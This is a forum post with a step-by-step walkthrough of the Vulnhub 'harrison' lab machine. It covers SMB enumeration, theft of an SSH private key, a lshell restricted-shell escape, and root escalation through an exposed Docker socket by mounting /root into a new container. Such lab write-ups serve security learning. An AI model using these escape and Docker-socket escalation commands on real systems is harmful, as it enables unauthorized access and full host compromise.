Vulnhub之Harrison靶机详细测试过程(提权成功)

打印 上一主题 下一主题

主题 721|帖子 721|积分 2163

Harrison

作者:jason huawen
靶机信息

名称: SP: harrison
地址:
  1. https://www.vulnhub.com/entry/sp-harrison,302/
复制代码
识别目标主机IP地址
  1. ─(kali㉿kali)-[~/Vulnhub/Harrison]
  2. └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
  3. Currently scanning: Finished!   |   Screen View: Unique Hosts                                                              
  4.                                                                                                                            
  5. 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
  6. _____________________________________________________________________________
  7.    IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
  8. -----------------------------------------------------------------------------
  9. 192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor                                                           
  10. 192.168.56.100  08:00:27:19:b1:e6      1      60  PCS Systemtechnik GmbH                                                   
  11. 192.168.56.125  08:00:27:a8:46:b3      1      60  PCS Systemtechnik GmbH        
复制代码
利用Kali LInux的netdiscover工具识别目标主机的IP地址为192.168.56.125
NMAP扫描
  1. ┌──(kali㉿kali)-[~/Vulnhub/Harrison]
  2. └─$ sudo nmap -sS -sV -sC -p- 192.168.56.125 -oN nmap_full_scan
  3. Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-22 19:19 EDT
  4. Nmap scan report for bogon (192.168.56.125)
  5. Host is up (0.000094s latency).
  6. Not shown: 65533 closed tcp ports (reset)
  7. PORT    STATE SERVICE     VERSION
  8. 22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
  9. | ssh-hostkey:
  10. |   2048 5b87f1fe678fa6ba8b753c11343db6b8 (RSA)
  11. |   256 93877e2e5e4ece7156a11c6bfc1f6e55 (ECDSA)
  12. |_  256 c014c024e8a87ed4cda64225f3484794 (ED25519)
  13. 445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
  14. MAC Address: 08:00:27:A8:46:B3 (Oracle VirtualBox virtual NIC)
  15. Service Info: Host: HARRISON; OS: Linux; CPE: cpe:/o:linux:linux_kernel
  16. Host script results:
  17. | smb2-time:
  18. |   date: 2023-04-23T07:19:44
  19. |_  start_date: N/A
  20. | smb-security-mode:
  21. |   account_used: guest
  22. |   authentication_level: user
  23. |   challenge_response: supported
  24. |_  message_signing: disabled (dangerous, but default)
  25. | smb2-security-mode:
  26. |   311:
  27. |_    Message signing enabled but not required
  28. | smb-os-discovery:
  29. |   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
  30. |   Computer name: harrison
  31. |   NetBIOS computer name: HARRISON\x00
  32. |   Domain name: \x00
  33. |   FQDN: harrison
  34. |_  System time: 2023-04-23T07:19:45+00:00
  35. |_clock-skew: mean: 8h00m00s, deviation: 0s, median: 7h59m59s
  36. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  37. Nmap done: 1 IP address (1 host up) scanned in 13.48 seconds
  38.                                                                
复制代码
NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、445(samba)
获得Shell
  1. ┌──(kali㉿kali)-[~/Vulnhub/Harrison]
  2. └─$ smbclient -L 192.168.56.125                                
  3. Password for [WORKGROUP\kali]:
  4. Anonymous login successful
  5.         Sharename       Type      Comment
  6.         ---------       ----      -------
  7.         Private         Disk      
  8.         IPC$            IPC       IPC Service (Samba 4.7.6-Ubuntu)
  9. Reconnecting with SMB1 for workgroup listing.
  10. do_connect: Connection to 192.168.56.125 failed (Error NT_STATUS_CONNECTION_REFUSED)
  11. Unable to connect with SMB1 -- no workgroup available
  12.                                                                                                                              
  13. ┌──(kali㉿kali)-[~/Vulnhub/Harrison]
  14. └─$ smbclient //192.168.56.125/Private
  15. Password for [WORKGROUP\kali]:
  16. Anonymous login successful
  17. Try "help" to get a list of possible commands.
  18. smb: \> ls
  19.   .                                   D        0  Thu Apr 18 12:55:51 2019
  20.   ..                                  D        0  Thu Apr 18 12:12:55 2019
  21.   .bash_logout                        H      220  Wed Apr  4 14:30:26 2018
  22.   .profile                            H      807  Wed Apr  4 14:30:26 2018
  23.   .bashrc                             H     3771  Wed Apr  4 14:30:26 2018
  24.   silly_cats                          D        0  Thu Apr 18 12:55:51 2019
  25.   .ssh                               DH        0  Thu Apr 18 12:42:57 2019
  26.   flag.txt                            N       32  Thu Apr 18 12:14:18 2019
  27.                 32894736 blocks of size 1024. 27322884 blocks available
  28. smb: \> get flag.txt
  29. getting file \flag.txt of size 32 as flag.txt (15.6 KiloBytes/sec) (average 15.6 KiloBytes/sec)
  30. smb: \> cd .ssh
  31. smb: \.ssh\> ls
  32.   .                                   D        0  Thu Apr 18 12:42:57 2019
  33.   ..                                  D        0  Thu Apr 18 12:55:51 2019
  34.   authorized_keys                     N      399  Thu Apr 18 12:42:57 2019
  35.   id_rsa                              A     1679  Thu Apr 18 12:14:17 2019
  36.   id_rsa.pub                          A      399  Thu Apr 18 12:14:17 2019
  37.                 32894736 blocks of size 1024. 27322884 blocks available
  38. smb: \.ssh\> get id_rsa
  39. getting file \.ssh\id_rsa of size 1679 as id_rsa (546.5 KiloBytes/sec) (average 334.2 KiloBytes/sec)
  40. smb: \.ssh\> get id_rsa.pub
  41. getting file \.ssh\id_rsa.pub of size 399 as id_rsa.pub (194.8 KiloBytes/sec) (average 294.4 KiloBytes/sec)
  42. smb: \.ssh\> get authorized_keys
  43. getting file \.ssh\authorized_keys of size 399 as authorized_keys (129.9 KiloBytes/sec) (average 245.0 KiloBytes/sec)
  44. smb: \.ssh\> cd ..
  45. smb: \> cd silly_cats\
  46. smb: \silly_cats\> ls
  47.   .                                   D        0  Thu Apr 18 12:55:51 2019
  48.   ..                                  D        0  Thu Apr 18 12:55:51 2019
  49.   cat3.jpg                            N    38624  Mon Jan  8 13:30:10 2018
  50.   cat1.jpg                            N    73946  Mon Jan  8 13:29:40 2018
  51.   cat2.jpg                            N    74130  Mon Jan  8 13:29:32 2018
  52.                 32894736 blocks of size 1024. 27322884 blocks available
  53. smb: \silly_cats\> get cat1.jpg
  54. getting file \silly_cats\cat1.jpg of size 73946 as cat1.jpg (24070.2 KiloBytes/sec) (average 5743.3 KiloBytes/sec)
  55. smb: \silly_cats\> get cat2.jpg
  56. getting file \silly_cats\cat2.jpg of size 74130 as cat2.jpg (24130.1 KiloBytes/sec) (average 9191.0 KiloBytes/sec)
  57. smb: \silly_cats\> get cat3.jpg
  58. getting file \silly_cats\cat3.jpg of size 38624 as cat3.jpg (18858.5 KiloBytes/sec) (average 10265.2 KiloBytes/sec)
  59. smb: \silly_cats\> quit
复制代码
  1. ─(kali㉿kali)-[~/Vulnhub/Harrison]
  2. └─$ enum4linux 192.168.56.125   
  3. [+] Enumerating users using SID S-1-22-1 and logon username '', password ''                                                  
  4.                                                                                                                              
  5. S-1-22-1-1000 Unix User\harrison (Local User)      
复制代码
enum4linux识别出用户名harrison
  1. ┌──(kali㉿kali)-[~/Vulnhub/Harrison]
  2. └─$ cat flag.txt     
  3. It's not going to be that easy.
复制代码
没那么容易?
  1.                                                                                                                            
  2. ┌──(kali㉿kali)-[~/Vulnhub/Harrison]
  3. └─$ chmod 400 id_rsa  
  4.                                                                                                                              
  5. ┌──(kali㉿kali)-[~/Vulnhub/Harrison]
  6. └─$ ssh -i id_rsa harrison@192.168.56.125
  7. The authenticity of host '192.168.56.125 (192.168.56.125)' can't be established.
  8. ED25519 key fingerprint is SHA256:O+XKyphfQuB/KW9A8/6nUKPZTAGMJNtRBH8CrijPGnY.
  9. This key is not known by any other names.
  10. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
  11. Warning: Permanently added '192.168.56.125' (ED25519) to the list of known hosts.
  12. Welcome to Harrison. Enjoy your shell.
  13. Type '?' or 'help' to get the list of allowed commands
  14. harrison:~$ id
  15. *** forbidden command: id
  16. harrison:~$
复制代码
虽然得到了shell,但是这是受限的shell
  1. ┌──(kali㉿kali)-[~/Vulnhub/Harrison]
  2. └─$ ssh -i id_rsa harrison@192.168.56.125 -t /bin/sh
  3. *** forbidden shell escape: "/bin/sh"
  4. This incident has been reported.
  5. Connection to 192.168.56.125 closed.
  6.                                                 
复制代码
用-t选项指定不同的shell没能逃脱受限的Shell
  1. harrison:~$ echo $SHELL
  2. *** forbidden path: /usr/bin/lshell
复制代码
可知为lshell
  1. harrison:~$ echo && "bash"
  2. harrison@harrison:~$ ls -alh
  3. total 44K
  4. drwxr-xr-x 1 harrison harrison 4.0K Apr 23 07:31 .
  5. drwxr-xr-x 1 root     root     4.0K Apr 18  2019 ..
  6. -rw-r--r-- 1 harrison harrison  220 Apr  4  2018 .bash_logout
  7. -rw-r--r-- 1 harrison harrison 3.7K Apr  4  2018 .bashrc
  8. drwx------ 2 harrison harrison 4.0K Apr 23 07:24 .cache
  9. -rw------- 1 harrison harrison  272 Apr 23 07:31 .lhistory
  10. -rw-r--r-- 1 harrison harrison  807 Apr  4  2018 .profile
  11. drwxr-xr-x 1 harrison harrison 4.0K Apr 18  2019 .ssh
  12. -rw-r--r-- 1 root     root       32 Apr 18  2019 flag.txt
  13. drwxr-xr-x 2 root     root     4.0K Apr 18  2019 silly_cats
  14. harrison@harrison:~$ cd /home
  15. harrison@harrison:/home$ ls
  16. harrison
  17. harrison@harrison:/home$
复制代码
用echo && "bash"逃逸,成为正常的shell
  1. harrison@harrison:/root$ ls -alh
  2. total 20K
  3. drwxr-xr-x 1 root root 4.0K Apr 18  2019 .
  4. drwxr-xr-x 1 root root 4.0K Apr 23 07:16 ..
  5. -rw-r--r-- 1 root root 3.1K Apr  9  2018 .bashrc
  6. -rw-r--r-- 1 root root  148 Aug 17  2015 .profile
  7. -rwxr--r-- 1 root root   49 Apr 18  2019 flag.txt
  8. harrison@harrison:/root$ cat flag.txt
  9. Nope. No flags here. Where do you think you are?
复制代码
提权

提权是通过docker实现的,但是过程太复杂了,是参考其他人的做法才能完成。
查看现有的容器
  1. harrison@harrison:~$ cd /tmp
  2. harrison@harrison:/tmp$ curl -XGET --unix-socket /var/run/docker.sock http://localhost/containers/json
  3. [{"Id":"902f9eaf084a2da13ce02a097e80c39686c73c6af1ffcc78602c83dde49ae534","Names":["/nervous_proskuriakova"],"Image":"cont1:v1","ImageID":"sha256:6275c2bd4f72c6c417458fa6caecf2bc23bf823298650334c3c3bd42579aa95f","Command":"/bin/sh -c '/etc/init.d/smbd start && /etc/init.d/ssh start && bash' /bin/bash","Created":1682237761,"Ports":[{"IP":"0.0.0.0","PrivatePort":22,"PublicPort":22,"Type":"tcp"},{"IP":"0.0.0.0","PrivatePort":445,"PublicPort":445,"Type":"tcp"}],"Labels":{},"State":"running","Status":"Up 56 seconds","HostConfig":{"NetworkMode":"default"},"NetworkSettings":{"Networks":{"bridge":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"a81871ff28475882e034ea03bb1aab0b2ba4d0d1271312250f1db62337acc2b0","EndpointID":"01e3e3658c213f253bd4d957175f1007e23e6e4c2d9268e14d80a36512d531fb","Gateway":"172.17.0.1","IPAddress":"172.17.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:11:00:02","DriverOpts":null}}},"Mounts":[{"Type":"bind","Source":"/var/run/docker.sock","Destination":"/var/run/docker.sock","Mode":"","RW":true,"Propagation":"rprivate"}]}]
复制代码
创建新容器:
  1. harrison@harrison:/tmp$ echo -e '{"Image":"ubuntu","Cmd":["/bin/sh"],"DetachKeys":"Ctrl-p,Ctrl-q","OpenStdin":true,"Mounts":[{"Type":"bind","Source":"/root/","Target":"/os_root"}]}' > container.json
复制代码
查看新创建的容器:
  1. harrison@harrison:/tmp$ curl -XPOST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock -d "$(cat container.json)" http://localhost/containers/create
  2. {"Id":"ea0a8e5839ab3e2817b02fb086a63a776f06afcd5a4f742eb5d8a898aae3719f","Warnings":null}
复制代码
启动新容器:
  1. harrison@harrison:/tmp$ curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/ea0a/start
复制代码
连接新创建的容器:
  1. harrison@harrison:/tmp$ nc -U /var/run/docker.sock
  2. POST /containers/34b3/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
  3. Host:
  4. Connection: Upgrade
  5. Upgrade: tcp   
  6. HTTP/1.1 404 Not Found
  7. Content-Type: application/vnd.docker.raw-stream
  8. No such container: 34b3
  9. harrison@harrison:/tmp$ nc -U /var/run/docker.sock
  10. POST /containers/ea0a/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
  11. Host:
  12. Connection: Upgrade
  13. Upgrade: tcp
  14. HTTP/1.1 101 UPGRADED
  15. Content-Type: application/vnd.docker.raw-stream
  16. Connection: Upgrade
  17. Upgrade: tcp
  18. ls
  19. ]bin
  20. boot
  21. dev
  22. etc
  23. home
  24. lib
  25. lib64
  26. media
  27. mnt
  28. opt
  29. os_root
  30. proc
  31. root
  32. run
  33. sbin
  34. srv
  35. sys
  36. tmp
  37. usr
  38. var
  39. cd os_root
  40. ls -alh
  41. �total 32K
  42. drwx------ 3 root root 4.0K Apr 18  2019 .
  43. drwxr-xr-x 1 root root 4.0K Apr 23 08:18 ..
  44. -rw------- 1 root root  289 Apr 18  2019 .bash_history
  45. -rw-r--r-- 1 root root 3.1K Apr  9  2018 .bashrc
  46. drwxr-xr-x 3 root root 4.0K Apr 16  2019 .local
  47. -rw-r--r-- 1 root root  148 Aug 17  2015 .profile
  48. -rw-r--r-- 1 root root   66 Apr 18  2019 .selected_editor
  49. -rwx------ 1 root root   73 Apr 18  2019 flag.txt
  50. cat flag.txt
  51. IDo you think you are out?
  52. Just kidding, here is your flag: 1xcDF933mce
复制代码
注意这里所有的命令都需要保持容器ID一致

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

笑看天下无敌手

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表